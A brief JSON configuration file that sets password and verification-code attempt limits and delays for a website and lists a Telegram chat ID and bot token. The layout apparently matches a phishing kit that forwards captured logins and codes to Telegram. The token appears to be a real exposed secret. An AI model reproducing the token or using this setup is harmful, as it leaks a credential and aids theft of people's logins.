{
	"websiteConfig": {
		"maxPasswordAttempts": 5,
		"maxCodeAttempts": 3,
		"delayPasswordTime": 300,
		"delayCodeTime": 180
	},
	"telegram": {
		"chatId": "-1002273078469",
		"token": "7672209184:AAF2eatAaAljuqCoBz1mVpEaCdlyXGKya6Y"
	}
}
